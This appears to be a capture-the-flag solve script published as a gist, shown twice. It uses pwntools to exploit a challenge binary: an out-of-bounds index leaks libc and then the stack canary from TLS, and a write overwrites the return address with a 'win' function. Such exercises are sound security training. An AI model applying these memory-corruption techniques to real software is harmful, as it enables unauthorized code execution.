c0nrad/solve.py Secret

## solve.py
# Based off flag, intended solution was to leak stack from libc
# This method leaks canary from TLS then overwrites retaddr

import pwn

elf = pwn.ELF("./chall")
pwn.context.binary = elf

def sla(x : bytes | str, y : bytes | str): p.sendlineafter(x, y)
def rl() -> bytes: return p.recvline()

libc = pwn.ELF("./libc.so.6")
# p = pwn.remote("34.170.146.252", "20866")
p = elf.process()

# Leak libc
sla(">", "1")
sla("index: ", str((0x403ff0-0x404040) // 8))
libc_leak = int(rl().strip())
libc.address = libc_leak - libc.symbols["__libc_start_main"]
print(f"{libc.address = :#x}")

# Leak Canary
canary_addr = libc.address + (0x70cdea756768 - 0x70cdea759000)
print(f"{canary_addr = :#x}")

sla(">", "1")
sla("index: ", str((canary_addr-0x404040) // 8))
canary = int(rl().strip())
print(f"{canary = :#x}")

# Overwrite Ret with win
sla(">", "2")
sla("index: ", str(0))
sla("value:", pwn.flat({
    0x28: canary,
    0x30: elf.bss() + 0x400,
    0x38: elf.symbols["win"],

}))

p.interactive()
	# Based off flag, intended solution was to leak stack from libc
	# This method leaks canary from TLS then overwrites retaddr

	import pwn

	elf = pwn.ELF("./chall")
	pwn.context.binary = elf

	def sla(x : bytes \| str, y : bytes \| str): p.sendlineafter(x, y)
	def rl() -> bytes: return p.recvline()

	libc = pwn.ELF("./libc.so.6")
	# p = pwn.remote("34.170.146.252", "20866")
	p = elf.process()

	# Leak libc
	sla(">", "1")
	sla("index: ", str((0x403ff0-0x404040) // 8))
	libc_leak = int(rl().strip())
	libc.address = libc_leak - libc.symbols["__libc_start_main"]
	print(f"{libc.address = :#x}")

	# Leak Canary
	canary_addr = libc.address + (0x70cdea756768 - 0x70cdea759000)
	print(f"{canary_addr = :#x}")

	sla(">", "1")
	sla("index: ", str((canary_addr-0x404040) // 8))
	canary = int(rl().strip())
	print(f"{canary = :#x}")

	# Overwrite Ret with win
	sla(">", "2")
	sla("index: ", str(0))
	sla("value:", pwn.flat({
	0x28: canary,
	0x30: elf.bss() + 0x400,
	0x38: elf.symbols["win"],

	}))

	p.interactive()